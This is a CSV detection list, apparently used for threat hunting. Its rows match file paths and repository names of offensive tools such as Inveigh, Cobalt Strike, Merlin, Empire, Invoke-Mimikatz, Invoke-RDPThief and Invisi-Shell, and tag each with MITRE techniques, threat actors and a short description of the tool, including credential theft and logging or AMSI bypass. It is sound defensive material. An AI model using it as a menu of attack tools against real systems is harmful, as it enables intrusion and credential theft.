"*/Inveigh.txt*",".{0,1000}\/Inveigh\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","8123"
"*/Inveigh-Cleartext.txt*",".{0,1000}\/Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8124"
"*/Inveigh-Cleartext.txt*",".{0,1000}\/Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8125"
"*/Inveigh-FormInput.txt*",".{0,1000}\/Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8126"
"*/Inveigh-FormInput.txt*",".{0,1000}\/Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8127"
"*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8128"
"*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","8129"
"*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8130"
"*/Inveigh-NTLMv1.txt*",".{0,1000}\/Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8131"
"*/Inveigh-NTLMv1.txt*",".{0,1000}\/Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8132"
"*/Inveigh-NTLMv2.txt*",".{0,1000}\/Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8133"
"*/Inveigh-NTLMv2.txt*",".{0,1000}\/Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8134"
"*/Invisi-Shell.git*",".{0,1000}\/Invisi\-Shell\.git.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","8135"
"*/invocation:tor.service*",".{0,1000}\/invocation\:tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8136"
"*/Invoke-Adeleginator*",".{0,1000}\/Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","8137"
"*/Invoke-ADEnum.git*",".{0,1000}\/Invoke\-ADEnum\.git.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","8138"
"*/Invoke-ADSBackdoor.ps1*",".{0,1000}\/Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8139"
"*/Invoke-ArgFuscator.git*",".{0,1000}\/Invoke\-ArgFuscator\.git.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8140"
"*/Invoke-ArgFuscator/releases/*",".{0,1000}\/Invoke\-ArgFuscator\/releases\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8141"
"*/Invoke-ArgFuscator/tarball/*",".{0,1000}\/Invoke\-ArgFuscator\/tarball\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8142"
"*/Invoke-ArgFuscator/zipball/*",".{0,1000}\/Invoke\-ArgFuscator\/zipball\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","8143"
"*/Invoke-Bof/*",".{0,1000}\/Invoke\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","8144"
"*/Invoke-CleverSpray.git*",".{0,1000}\/Invoke\-CleverSpray\.git.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","8145"
"*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","8146"
"*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8147"
"*/Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\/Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8148"
"*/Invoke-EternalBlue.ps1*",".{0,1000}\/Invoke\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8149"
"*/Invoke-ExcelMacroPivot.ps1*",".{0,1000}\/Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8150"
"*/Invoke-HostEnum.ps1*",".{0,1000}\/Invoke\-HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","8151"
"*/Invoke-InternalMonologue.ps1*",".{0,1000}\/Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8152"
"*/Invoke-MDExclusionParser.ps1*",".{0,1000}\/Invoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","8154"
"*/Invoke-Mimikatz.ps1*",".{0,1000}\/Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8155"
"*/Invoke-MS16032.ps1*",".{0,1000}\/Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8156"
"*/Invoke-MS16135.ps1*",".{0,1000}\/Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8157"
"*/Invoke-Obfuscation.git*",".{0,1000}\/Invoke\-Obfuscation\.git.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","8158"
"*/Invoke-PowerThIEf.ps1*",".{0,1000}\/Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8159"
"*/Invoke-RDPThief.git*",".{0,1000}\/Invoke\-RDPThief\.git.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","8160"
"*/Invoke-RunAs.ps1*",".{0,1000}\/Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8161"
"*/Invoke-RunAsSystem.git*",".{0,1000}\/Invoke\-RunAsSystem\.git.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","8162"
"*/Invoke-RunAsWithCert.git*",".{0,1000}\/Invoke\-RunAsWithCert\.git.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","8163"
"*/Invoke-SessionHunter.git*",".{0,1000}\/Invoke\-SessionHunter\.git.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","8164"
"*/Invoke-SMBRemoting.git*",".{0,1000}\/Invoke\-SMBRemoting\.git.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","8165"
